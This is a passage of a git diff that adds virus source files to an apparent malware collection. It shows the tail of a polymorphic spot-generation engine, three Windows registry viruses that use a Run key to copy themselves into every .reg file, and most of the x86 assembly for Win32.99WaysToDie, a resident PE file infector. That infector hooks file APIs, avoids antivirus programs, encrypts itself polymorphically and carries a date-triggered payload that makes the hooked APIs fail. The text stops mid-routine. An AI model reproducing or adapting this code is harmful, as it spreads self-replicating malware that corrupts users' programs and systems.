NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +reset: + ; Ïîäïðîãðàììà èíèöèàëèçàöèè + ; ïåðåìåííûõ + mov edi,[ebp+start_code] ; + ; + push esi ; Èíèöèàëèçèðóåì ïåðåìåííûå + lea esi,[ebp+rest_bytes] ; + mov [ebp+pointer],esi ; + pop esi ; + + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOT JUMP LENGTH GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; LENGTH OF SPOT JUMP -> EAX ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +len_sp_jmp: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; äëèíû ïðûæêà + + mov eax,150 ; + call brandom32 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + cmp eax,45 ; â äèàïàçîíå 45..149 + jle len_sp_jmp ; + + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; SPOTS NUMBER GENERATION SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; NO OUTPUT IN SUBROUTINE ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +num_spots: + ; Ïîäïðîãðàììà ãåíåðàöèè + ; êîëè÷åñòâà ïÿòåí + + pusha ; Ñîõðàíÿåì âñ¸ â ñòýêå + + mov eax,40 ; Ãåíåðèðóåì ñëó÷àéíîå ÷èñëî + call brandom32 ; â äèàïàçîíå 1..40 + inc eax ; È ñîõðàíÿåì åãî â + mov [ebp+n_spots],eax ; ïåðåìåííîé + + popa ; Âûíèìàåì âñ¸ èç ñòýêà + ret ; Âîçâðàò èç ïðîöåäóðû +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +; TESTING SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ IN ] ; +; ; +; NO INPUT IN SUBROUTINE ; +;------------------------------------------------------------------------------; +; [ OUT ] ; +; ; +; CARRY FLAG ; +;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx; +testing: + ; Ïîäïðîãðàììà ïðîâåðêè + ; ïîïàäåíèÿ â ãðàíèöó ñåêöèè + + push edi eax ; Ñîõðàíÿåì edi eax â ñòýêå + + add edi,[ebp+num1] ; Äîáàâèì ê edi 1-óþ äëèíó + ; ìóñîðíûõ èíñòðóêöèé + add edi,[ebp+num2] ; Ïîñëå ýòîãî äîáàâèì 2-óþ + add edi,300 ; È äîáàâèì ÷èñëî â êîòîðîå + ; âõîäèò ìàêñèìàëüíûé ðàçìåð + ; ïÿòíà + äëèíà åãî ïðûæêà + mov eax,[ebp+size_for_spot] ;  eax çàãðóçèì ðàçìåð + ; ìåñòà äëÿ ïÿòåí è ñìåùåíèå + add eax,[ebp+start_code] ; â ïàìÿòè òî÷êè âõîäà + + cmp edi,eax ; Ñðàâíèì eax è edi + clc ; Ñáðîñèì carry ôëàã + jl m_space ; Åñëè edi ìåíüøå, òî âñå + ; õîðîøî + mov [ebp+n_spots],ecx ; Åñëè íåò, òî ìû óìåíüøàåì + inc [ebp+n_spots] ; êîëè÷åñòâî ïÿòåí è + stc ; óñòàíàâëèâàåì carry ôëàã +m_space: + pop eax edi ; Âûíèìàåì eax è edi + ret ; Âîçâðàò èç ïðîöåäóðû +;------------------------------------------------------------------------------; +pointer dd 0 ; +n_spots dd 0 ; + ; +num1 dd 0 ; +num2 dd 0 ; + ; Äàííûå íåîáõîäèìûå äëÿ +PE_header dd 0 ; ðàáîòû ìîòîðà +old_eip dd 0 ; +image_base dd 0 ; +start_code dd 0 ; +new_eip dd 0 ; +map_address dd 0 ; +size_for_spot dd 0 ; +rest_bytes: db 2100 dup (?) ; +;------------------------------------------------------------------------------; diff --git a/Win32/Virus.WinREG.Antireg.b b/Win32/Virus.WinREG.Antireg.b new file mode 100644 index 00000000..02fe7cfd --- /dev/null +++ b/Win32/Virus.WinREG.Antireg.b @@ -0,0 +1,13 @@ +REGEDIT4 + +;;-------------------------------;; +;; ;; +;; AntiREG (The First REG Virus) ;; +;; Coded By Lys Kovick ;; +;; Special Thanks To Phage ;; +;; ;; +;;-------------------------------;; + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %i in (%windir%\\system\\*.reg) do regedit /e %i HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + diff --git a/Win32/Virus.WinREG.Sptohell b/Win32/Virus.WinREG.Sptohell new file mode 100644 index 00000000..c7b96c44 --- /dev/null +++ b/Win32/Virus.WinREG.Sptohell @@ -0,0 +1,24 @@ +REGEDIT 4 + +;; WinREG.Wow +;; written by SeCoNd PaRt To HeLl +;; for my Virus Database + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" + +;; Wow +;; WowWow +;; WowWowWow +;; WowWowWowWow +;; WowWowWowWowWow +;; WowWowWowWowWowWow +;; WowWowWowWowWowWowWow +;; WowWowWowWowWowWowWowWow +;; WowWowWowWowWowWowWow +;; WowWowWowWowWowWow +;; WowWowWowWowWow +;; WowWowWowWow +;; WowWowWow +;; WowWow +;; Wow \ No newline at end of file diff --git a/Win32/Virus.WinREG.Sptohell.b b/Win32/Virus.WinREG.Sptohell.b new file mode 100644 index 00000000..c2fca8c0 --- /dev/null +++ b/Win32/Virus.WinREG.Sptohell.b @@ -0,0 +1,14 @@ +REGEDIT 4 + +;; *************** --> WinREG.Sptohell <-- + + + --> by Second Part To Hell [rRlf] <-- *************** +;; +;; You may ask: "Why do I write such an nonsence virus?"! +fg+ The reason is, that I have nerver seen such an virus +;; in any ezine before. And I think, much ppl don't know, that such viruses exist. +;; +;; The virus itself is fuckin easy. First it copies itself to the Registry, so the code will started by every +;; start of the computer. The code searchs for every *.reg file in 4 directories. If it finds some, it copies +;; itself (the code in the registry) to these .REG-files. + + +[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\] +@="command /c for %q in (%windir%\*.reg %path%\*.reg C:\*.reg %windir%\system\*.reg) do regedit /e %q HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\" \ No newline at end of file diff --git a/Win32/Win32.99WaysToDie.asm b/Win32/Win32.99WaysToDie.asm new file mode 100644 index 00000000..e7725714 --- /dev/null +++ b/Win32/Win32.99WaysToDie.asm @@ -0,0 +1,1886 @@ + +; +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; 99 Ways To Die ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; Coded by Bumblebee/29a ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ +; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +; ³ Words from the author ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ +; . It could seem like a remake of Win32.RainSong. But i feel it's a +; quite new virus. I ever try to re-use some 'well coded' piezes of +; code, so this virus has little parts of RainSong, AOC, ... +; . I hope you'll find it interesting, even if you've seen my previous +; viruses yet due it infects dinamic link libraries and executables. +; . The name this time is due a kewl song by Megadeth. 99 Ways to die! +; +; ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿ +; ³ Disclaimer ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ +; . This is the source code of a VIRUS. The author is not responsabile +; of any damage that may occur due to the assembly of this file. Use +; it at your own risk. Cuidadiiin! +; +; ÚÄÄÄÄÄÄÄÄÄÄ¿ +; ³ Features ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÀÄÄÄÄÄÄÄÄÄÄÙ +; . Win32 per-process resident PE infector. +; . Infects 10 files per time from current and windows folders. +; . Infection increasing last section. +; . Uses EPO tech. If it cannot apply EPO, it doesn't infect. This makes +; the virus more hard to detect, but infection ratio falls a bit... +; . Uses variable encryption with polymorphism and variable key slide. +; . Size padding as infection sign. Also avoids to infect files with +; CERW attributes in last section (i assume they're infected yet). +; Marks files that are not adequate to be infected. +; . Updates PE header checksum after infection. +; . Hooks: +; CreateFileA +; MoveFileA +; CopyFileA +; CreateProcessA +; SetFileAttributesA +; GetFileAttributesA +; SearchPathA +; SetCurrentDirectoryA +; . Gets KERNEL32.DLL address using SEH and searches for Win9x, WinNt +; and Win2k. +; . Uses CRC32 instead of names to get needed APIs. +; . Self integrity check using CRC32. This is easy to implement and +; quite effective way to make debug harder. +; . Infects PE files with extension: EXE SCR CPL DLL. +; . Takes care of the relocations (it infects DLL). +; . Avoids infect most used av (only in runtime part). +; . Has active payload about a year after infection. Payload remains +; active a whole month. At this month hooked API will not work. This +; is not as 'terrible' as it seems. User can change the date... +; I know avers are going to say '...it's a dangerous...' shit. +; +; There are other interesting things, but i think is better you take a +; look to the comments inside the code. Moreover in 29#5 there is a +; little article about considerations while infecting DLL. +; +; I realy need a break... no more virus coding for some months. I hope +; you'll find nice this release. I have an idea about a nice tech... +; +; +; The way of the bee +; +.486p +locals +.model flat,STDCALL + + extrn ExitProcess:PROC ; needed for 1st generation + extrn MessageBoxA:PROC + +; +; Some macros and equs +; + +@strz macro string + jmp @@a +@@b: + db string,0 +@@a: + push offset @@b +endm + +; Notice this could work only in my system due the harcoded address of +; MessageBoxA, but this is only for debug in my comp ;) +@debug macro title,reg + pushad + push 1000h +@@tit: @strz title + pop eax + add eax,ebp + push eax + push reg + push 0h + mov eax,0bff5412eh + call eax + popad +endm + +@hook macro ApiAddress + lea eax,ApiAddress + jmp generalHook +endm + +vSize equ vEnd-vBegin +PADDING equ 101 +STRINGTOP equ 160 +crptSize equ vSize-5 + +; from BC++ Win32 API on-line Reference +WIN32_FIND_DATA struc +dwFileAttributes dd 0 +dwLowDateTime0 dd ? ; creation +dwHigDateTime0 dd ? +dwLowDateTime1 dd ? ; last access +dwHigDateTime1 dd ? +dwLowDateTime2 dd ? ; last write +dwHigDateTime2 dd ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved dd 0,0 +cFileName db 260 dup(0) +cAlternateFilename db 14 dup(0) + db 2 dup(0) +WIN32_FIND_DATA ends + + +.DATA + ; dummy data + db 'WARNING - This is a virus carrier - WARNING' + +.CODE +inicio: ; now i've realized i ever + ; put this label in spanish! + pushad + call getDelta + + lea esi,vBegin+ebp ; setup CRC32 for 1st + mov edi,vSize-4 ; generation + call CRC32 + mov dword ptr [myCRC32+ebp],eax + + xor dword ptr [hostRET+ebp],eax ; hide hostEP + popad + +; +; 99Ways begins here! +; +vBegin label byte + call crypt ; decrypt + + ; here starts encrypted data -> vBegin + 5 + pushad + + ; get delta offset + call getDelta + + mov eax,dword ptr [myCRC32+ebp] ; restore hostEP + xor dword ptr [hostRET+ebp],eax ; before CRC32 + + lea esi,vBegin+ebp ; integrity check + mov edi,vSize-4 ; using CRC32 + call CRC32 + + cmp eax,dword ptr [myCRC32+ebp] + je skipFakeProcess + + cli + call $ ; this will fake the proc + +skipFakeProcess: + mov esi,dword ptr [kernel32+ebp] ; test last used + call GetKernel32 + jnc getAPIsNow + + mov esi,077f00000h ; test for winNt + call GetKernel32 + jnc getAPIsNow + + mov esi,077e00000h ; test for win2k + call GetKernel32 + jnc getAPIsNow + + mov esi,0bff70000h ; test for win9x + call GetKernel32 + jc returnHost + +getAPIsNow: + ; now get APIs using CRC32 + mov edi,0bff70000h ; coded using win9x +kernel32 equ $-4 + ; ^ this is a nice way to optimize code and hide data, + ; almost all the non-temporary data can be plazed inside code! + mov esi,edi + mov esi,dword ptr [esi+3ch] + add esi,edi + mov esi,dword ptr [esi+78h] + add esi,edi + add esi,1ch + + lodsd + add eax,edi + mov dword ptr [address+ebp],eax + lodsd + add eax,edi + mov dword ptr [names+ebp],eax + lodsd + add eax,edi + mov dword ptr [ordinals+ebp],eax + + sub esi,16 + lodsd + mov dword ptr [nexports+ebp],eax + + xor edx,edx + mov dword ptr [expcount+ebp],edx + lea eax,FSTAPI+ebp + +searchl: + mov esi,dword ptr [names+ebp] + add esi,edx + mov esi,dword ptr [esi] + add esi,edi + push eax edx edi + xor edi,edi + movzx di,byte ptr [eax+4] + call CRC32 + xchg ebx,eax + pop edi edx eax + cmp ebx,dword ptr [eax] + je fFound + add edx,4 + inc dword ptr [expcount+ebp] + push edx + mov edx,dword ptr [expcount+ebp] + cmp dword ptr [nexports+ebp],edx + pop edx + je returnHost + jmp searchl +fFound: + shr edx,1 + add edx,dword ptr [ordinals+ebp] + xor ebx,ebx + mov bx,word ptr [edx] + shl ebx,2 + add ebx,dword ptr [address+ebp] + mov ecx,dword ptr [ebx] + add ecx,edi + + mov dword ptr [eax+5],ecx + add eax,9 + xor edx,edx + mov dword ptr [expcount+ebp],edx + lea ecx,ENDAPI+ebp + cmp eax,ecx + jb searchl + + ; make a copy of virus in memory and work there + push 00000040h + push 00001000h OR 00002000h + push (vSize+1000h) + push 0h + call dword ptr [_VirtualAlloc+ebp] + or eax,eax + jz returnHost + + lea edi,vBegin+ebp + sub edi,dword ptr [virusEP+ebp] + add dword ptr [imageBase+ebp],edi ; fix relocations + ; in the hook routine + lea esi,vBegin+ebp + mov edi,eax + mov ecx,vSize + rep movsb + + ; patch file loaded copy + call patchVirusBody + + ; jmp into memory copy - put into edi the return address + ; for the memory copy + lea edi,vBegin+ebp + add eax,offset memCopy-offset vBegin + push eax + ret + +memCopy: + ; get delta offset another time for memory copy + call getDelta + ; setup the ret to jmp patched virus copy + mov dword ptr [retPatch+ebp],edi + + mov byte ptr [payload+ebp],0 + + lea edx,dateTime+ebp + push edx + call dword ptr [_GetSystemTime+ebp] + + lea edx,dateTime+ebp + mov ax,word ptr [edx+2] + mov bx,-1 +countdown equ $-2 + ; another time + cmp bx,ax ; the day arrived? + jne skipPay + + mov byte ptr [payload+ebp],1 + +skipPay: + ; alloc a temporary buffer to generate the poly sample + ; of the virus ready to infect + push 00000004h + push 00001000h OR 00002000h + push (vSize+1000h) + push 0h + call dword ptr [_VirtualAlloc+ebp] + or eax,eax + jz quitFromMem + + mov dword ptr [memHnd+ebp],eax + + ; the same polymorphic routine is used for each infection + ; in the current execution of the virus + call dword ptr [_GetTickCount+ebp] + mov edi,dword ptr [memHnd+ebp] + add edi,vSize + mov ecx,(crptSize/4)-(4-(crptSize MOD 4)) + call GenDCrpt + ; store the size of the sample (for infection process) + add eax,vSize + mov dword ptr [gensize+ebp],eax + + ; Hook the API to get per-process residency + ; Notice this must be called before any infection + call hookApi + + ; set infection counter to 10 + mov byte ptr [infCount+ebp],10 + call infectDir ; infect current + + cmp byte ptr [infCount+ebp],0 ; better performance + je quitFromMem + + lea esi,currentPath+ebp ; get current directory + push esi + push STRINGTOP + call dword ptr [_GetCurrentDirectoryA+ebp] + or eax,eax + jz quitFromMem + + push STRINGTOP ; get windows directory + lea esi,tmpPath+ebp + push esi + call dword ptr [_GetWindowsDirectoryA+ebp] + or eax,eax + jz quitFromMem + + lea esi,tmpPath+ebp ; goto windows directory + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + or eax,eax + jz quitFromMem + + call infectDir ; infect windows folder + + lea esi,currentPath+ebp ; go back home + push esi + call dword ptr [_SetCurrentDirectoryA+ebp] + + ; this is the way to return host + ; from the memory copy + jmp quitFromMem + +returnHost: + + ; patch virus + call patchVirusBody + +quitFromMem: + popad + push 1234568h +retPatch equ $-4 + ret + +; i know this way to go back to host it's a bit weird but +; supports relocations (for DLL) and patches the virus +; to avoid be called more than once and ... +patchVirusBody: + lea edi,vBegin+ebp + mov dword ptr [retPatch+ebp],edi + mov byte ptr [edi],0e9h + mov esi,offset fakeHost +hostRET equ $-4 + ; hehe + mov edx,edi + sub edx,offset vBegin +virusEP equ $-4 + ; hehehe + add esi,edx + sub esi,5 + sub esi,edi + mov dword ptr [edi+1],esi + ret +; +; Returns Delta offset into ebp. +; +getDelta: + call delta +delta: + pop ebp + sub ebp,offset delta + ret +; +; Gets KERNEL32.DLL address in memory. +; +GetKernel32: + pushad + xor edx,edx + lea eax,dword ptr [esp-8h] + xchg eax,dword ptr fs:[edx] + lea edi,GetKernel32Exception+ebp + push edi + push eax + + cmp word ptr [esi],'ZM' + jne GetKernel32NotFound + mov dx,word ptr [esi+3ch] + cmp esi,dword ptr [esi+edx+34h] + jne GetKernel32NotFound + mov dword ptr [kernel32+ebp],esi + + xor edi,edi + pop dword ptr fs:[edi] + pop eax + popad + clc + ret + +GetKernel32Exception: + xor edi,edi + mov eax,dword ptr fs:[edi] + mov esp,dword ptr [eax] +GetKernel32NotFound: + xor edi,edi + pop dword ptr fs:[edi] + pop eax + popad + stc + ret +; +; This routine makes CRC32. +; +CRC32: + cld + xor ecx,ecx + dec ecx + mov edx,ecx + push ebx +NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 +NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h +NoCRC: + dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi + jnz NextByteCRC + pop ebx + not edx + not ecx + mov eax,edx + rol eax,16 + mov ax,cx + ret +; +; This routine hooks the APIs that gives virus residency. +; Takes care of relocations. +; +hookApi: + pushad + ; init the sem to free + mov byte ptr [semHook+ebp],0 + mov edx,400000h +imageBase equ $-4 + ; ;) + cmp word ptr [edx],'ZM' + jne noHook + mov edi,edx + add edi,dword ptr [edx+3ch] + cmp word ptr [edi],'EP' + jne noHook + mov edi,dword ptr [edi+80h] ; RVA import + or edi,edi + jz noHook + add edi,edx +searchK32Imp: + mov esi,dword ptr [edi+0ch] ; get name + or esi,esi + jz noHook + add esi,edx + push edi ; save (stringUp doesn't) + call stringUp + pop edi + jc nextName + lea esi,stringBuffer+ebp + cmp dword ptr [esi],'NREK' ; look for Kernel32 module + jne nextName + cmp dword ptr [esi+4],'23LE' + je k32ImpFound +nextName: + add edi,14h + mov esi,dword ptr [edi] + or esi,esi + jz noHook + jmp searchK32Imp +k32ImpFound: + mov esi,dword ptr [edi+10h] ; get address table + or esi,esi + jz noHook + add esi,edx + lea ecx,HOOKTABLEEND+ebp +nextImp: ; search for APIs + lea edx,HOOKTABLEBEGIN+ebp + lodsd + or eax,eax + jz noHook +checkNextAPI: + mov edi,dword ptr [edx] + cmp eax,dword ptr [edi+ebp] + je doHook + add edx,8 + cmp edx,ecx + jne checkNextAPI + jmp nextImp +doHook: + mov eax,dword ptr [edx+4] + add eax,ebp + mov dword ptr [esi-4],eax + add edx,8 + cmp edx,ecx + jne nextImp +noHook: + popad + ret +; +; Changes to upper case the string by esi storing into stringBuffer. +; Sets carry flag if our string buffer is small. Returns in edi the +; end of the string into the buffer. +; +stringUp: + push esi eax + lea edi,stringBuffer+ebp + mov eax,edi + add eax,STRINGTOP +stringUpLoop: + cmp eax,edi + jne continueStringUp + stc + jmp stringUpOut +continueStringUp: + movsb + cmp byte ptr [esi-1],'a' + jb skipThisChar + cmp byte ptr [esi-1],'z' + ja skipThisChar + add byte ptr [edi-1],'A'-'a' +skipThisChar: + cmp byte ptr [esi-1],0 + jne stringUpLoop + dec edi + clc +stringUpOut: + pop eax esi + ret +; +; The hooks. +; +Hook0: + @hook _CreateFileA +Hook1: + @hook _MoveFileA +Hook2: + @hook _CopyFileA +Hook3: + @hook _CreateProcessA +Hook4: + @hook _SetFileAttributesA +Hook5: + @hook _GetFileAttributesA +Hook6: + @hook _SearchPathA +Hook7: + @hook _SetCurrentDirectoryA +; +; This is the general hook that provides per-process residency. +; +generalHook: + push eax + pushad + pushfd + cld + + ; get delta offset + call getDelta + ; setup the return hook + mov eax,dword ptr [eax+ebp] + mov dword ptr [esp+24h],eax + + ; check if filename==NULL + mov esi,dword ptr [esp+2ch] + or esi,esi + jz leaveHook + + ; check semaphore + cmp byte ptr [semHook+ebp],0 + jne leaveHook + + mov byte ptr [semHook+ebp],1 + + cmp byte ptr [payload+ebp],0 + je skipPayloadEffect + + ; in the date of activation all hooked APIs will fail + xor eax,eax + mov dword ptr [esp+2ch],eax + jmp hookInfectionFail + +skipPayloadEffect: + call stringUp + jc hookInfectionFail + + push edi ; test the string it's + sub edi,esi ; long enought + cmp edi,5 + pop edi + jna hookInfectionFail + + cmp dword ptr [edi-4],'EXE.' + je infectThisFile + cmp dword ptr [edi-4],'LLD.' + je infectThisFile + cmp dword ptr [edi-4],'LPC.' + je infectThisFile + cmp dword ptr [edi-4],'RCS.' + jne hookInfectionFail + +infectThisFile: + lea esi,stringBuffer+ebp ; erm... here could touch + call infect ; any av! + +hookInfectionFail: + mov byte ptr [semHook+ebp],0 +leaveHook: + popfd + popad + ret +; +; Infects PE files in current directory. It affects EXE, SCR, CPL and DLL +; extensions. +; +infectDir: + pushad + + lea esi,find_data+ebp + push esi + lea esi,fndMask+ebp + push esi + call dword ptr [_FindFirstFileA+ebp] + inc eax + jz notFound + dec eax + + mov dword ptr [findHnd+ebp],eax + +findNext: + lea esi,find_data.cFileName+ebp + call stringUp + lea esi,stringBuffer+ebp + push edi ; test the string it's + sub edi,esi ; long enought + cmp edi,5 + pop edi + jna skipThisFile + cmp dword ptr [edi-4],'EXE.' + je validFileExt + cmp dword ptr [edi-4],'LLD.' + je validFileExt + cmp dword ptr [edi-4],'LPC.' + je validFileExt + cmp dword ptr [edi-4],'RCS.' + jne skipThisFile + +validFileExt: + mov eax,dword ptr [find_data.nFileSizeLow+ebp] + cmp eax,8000h + jb skipThisFile ; at least 8000h bytes? + mov ecx,PADDING ; test if it's infected + xor edx,edx ; yet + div ecx + or edx,edx ; reminder is zero? + jz skipThisFile + +testIfAv: ; let's search for strings + ; that may appear in av progs + lea edi,avStrings+ebp + mov ecx,vStringsCout +testIfAvL: + push esi + mov ax,word ptr [edi] +testAvLoop: + cmp word ptr [esi],ax + jne contTestLoop + pop esi + jmp skipThisFile +contTestLoop: + inc esi + cmp byte ptr [esi+3],0 ; skip the extension + jne testAvLoop + pop esi + add edi,2 + loop testIfAvL + + lea esi,stringBuffer+ebp + call infect + + cmp byte ptr [infCount+ebp],0 ; test 10 infections + je infectionDone + +skipThisFile: + lea esi,find_data+ebp + push esi + push dword ptr [findHnd+ebp] + call dword ptr [_FindNextFileA+ebp] ; Find next file + or eax,eax + jnz findNext + +infectionDone: + push dword ptr [findHnd+ebp] + call dword ptr [_FindClose+ebp] + +notFound: + popad + ret +; +; Infects PE file increasing last section. +; +; ESI: addr of file name of PE to infect. +; +infect: + pushad + mov dword ptr [fNameAddr+ebp],esi + + push esi + push esi + call dword ptr [_GetFileAttributesA+ebp] + pop esi + inc eax + jz infectionError + dec eax + + mov dword ptr [fileAttrib+ebp],eax + + push esi + push 00000080h + push esi + call dword ptr [_SetFileAttributesA+ebp] + pop esi + or eax,eax + jz infectionError + + xor eax,eax + push eax + push 00000080h + push 00000003h + push eax + push eax + push 80000000h OR 40000000h + push esi + call dword ptr [_CreateFileA+ebp] + inc eax + jz infectionErrorAttrib + dec eax + + mov dword ptr [fHnd+ebp],eax + + push 0h + push eax + call dword ptr [_GetFileSize+ebp] + inc eax + jz infectionErrorClose + dec eax + + mov dword ptr [fileSize+ebp],eax + + lea edi,fileTime2+ebp + push edi + lea edi,fileTime1+ebp + push edi + lea edi,fileTime0+ebp + push edi + push dword ptr [fHnd+ebp] + call dword ptr [_GetFileTime+ebp] + or eax,eax + jz infectionErrorClose + + xor eax,eax + push eax + push eax + push eax + push 00000004h + push eax + push dword ptr [fHnd+ebp] + call dword ptr [_CreateFileMappingA+ebp] + or eax,eax + jz infectionErrorClose + + mov dword ptr [fhmap+ebp],eax + + xor eax,eax + push eax + push eax + push eax + push 00000004h OR 00000002h + push dword ptr [fhmap+ebp] + call dword ptr [_MapViewOfFile+ebp] + or eax,eax + jz infectionErrorCloseMap + + mov dword ptr [mapMem+ebp],eax + + mov edi,eax + cmp word ptr [edi],'ZM' + jne infectionErrorCloseUnmap + + cmp word ptr [edi+12h],'(:' ; not valid file? + je infectionErrorCloseUnmap + + add edi,dword ptr [edi+3ch] + cmp eax,edi + ja notValidFile ; avoid fucking headers + add eax,dword ptr [fileSize+ebp] + cmp eax,edi + jb notValidFile ; avoid fucking headers + cmp word ptr [edi],'EP' + jne notValidFile + + mov edx,dword ptr [edi+16h] ; test it's a valid PE + and edx,2h ; i want executable + jz notValidFile + xor edx,edx + mov dx,word ptr [edi+5ch] + dec edx ; i don't want NATIVE + jz notValidFile + + mov edx,edi + + cmp dword ptr [edx+28h],0 ; test code base!=0 + je notValidFile ; this check is for some + ; DLL with no exec code + mov esi,edi + mov eax,18h + add ax,word ptr [edi+14h] + add edi,eax + mov dword ptr [fstSec+ebp],edi + + push edx + mov cx,word ptr [esi+06h] + mov ax,28h + dec cx + mul cx + add edi,eax + pop edx + + test dword ptr [edi+24h],10000000h ; avoid this kind of section + jnz notValidFile ; we can corrupt it! + + mov eax,dword ptr [edi+24h] + and eax,0e0000020h + cmp eax,0e0000020h ; mmm... This is infected yet + je infectionErrorCloseUnmap + + mov eax,dword ptr [edi+10h] ; i rely on the headers... + add eax,dword ptr [edi+14h] + mov dword ptr [fileSize+ebp],eax + + sub eax,dword ptr [edi+14h] ; calc our RVA + add eax,dword ptr [edi+0ch] + mov dword ptr [myRVA+ebp],eax + ; save virus entry point to calc relocations in + ; execution time + add eax,dword ptr [esi+34h] + mov dword ptr [virusEP+ebp],eax + + call searchEPO ; Search for a call + jc notValidFile + + push edi edx ecx ; patch the call + mov edx,dword ptr [myRVA+ebp] + add edx,dword ptr [esi+34h] ; edx = dest rva + mov edi,dword ptr [EPORva+ebp] + add edi,dword ptr [esi+34h] ; edi = call rva + sub edx,edi + sub edx,5 ; edx patch the call + mov ecx,dword ptr [EPOAddr+ebp] + xchg dword ptr [ecx+1],edx + add edx,edi ; get the rva + add edx,5 + mov dword ptr [hostRET+ebp],edx ; and store it ;) + pop ecx edx edi + + mov eax,dword ptr [edi+08h] ; fix the virtual size + push edx ; if needed + mov ecx,dword ptr [edx+38h] ; some PE have strange + xor edx,edx ; virt size (cdplayer p.e.) + div ecx + inc eax + or edx,edx + jz rvaFixDone + xor edx,edx + mul ecx + + mov dword ptr [edi+08h],eax ; save the fixed virt size +rvaFixDone: + + ; save image base for hook API + mov edx,dword ptr [esi+34h] + mov dword ptr [imageBase+ebp],edx + pop edx + + push edx ; calc the new virtual size + mov eax,BUFFERSIZE ; for the section + add eax,vSize + mov ecx,dword ptr [edx+38h] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + pop edx + + add dword ptr [edi+08h],eax ; fix the virtual size + add dword ptr [edx+50h],eax ; fix the image size + + or dword ptr [edi+24h],0e0000020h ; set the properties + + push edx ; calc new size for + mov eax,dword ptr [gensize+ebp] ; the section + mov ecx,dword ptr [edx+3ch] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + pop edx + + add dword ptr [edi+10h],eax ; store the phys size + + mov edi,dword ptr [edx+80h] ; get RVA Import + xor ecx,ecx + mov cx,word ptr [edx+06h] ; number of sections + mov esi,dword ptr [fstSec+ebp] ; get 1st section addr + +impSectionLoop: ; look for import section + mov ebx,dword ptr [esi+0ch] + add ebx,dword ptr [esi+08h] ; test it's inside this + cmp edi,ebx ; section + jb impSectionFound + add esi,28h + dec ecx + jnz impSectionLoop + +impSectionFound: + or dword ptr [esi+24h],80000000h ; make writable + + push edx ; calc file padding + mov ecx,PADDING ; (infection sign) + add eax,dword ptr [fileSize+ebp] + xor edx,edx + div ecx + inc eax + xor edx,edx + mul ecx + mov dword ptr [pad+ebp],eax + pop edx + + ; update the virus sample ready to infect. + call updateVSample + + push 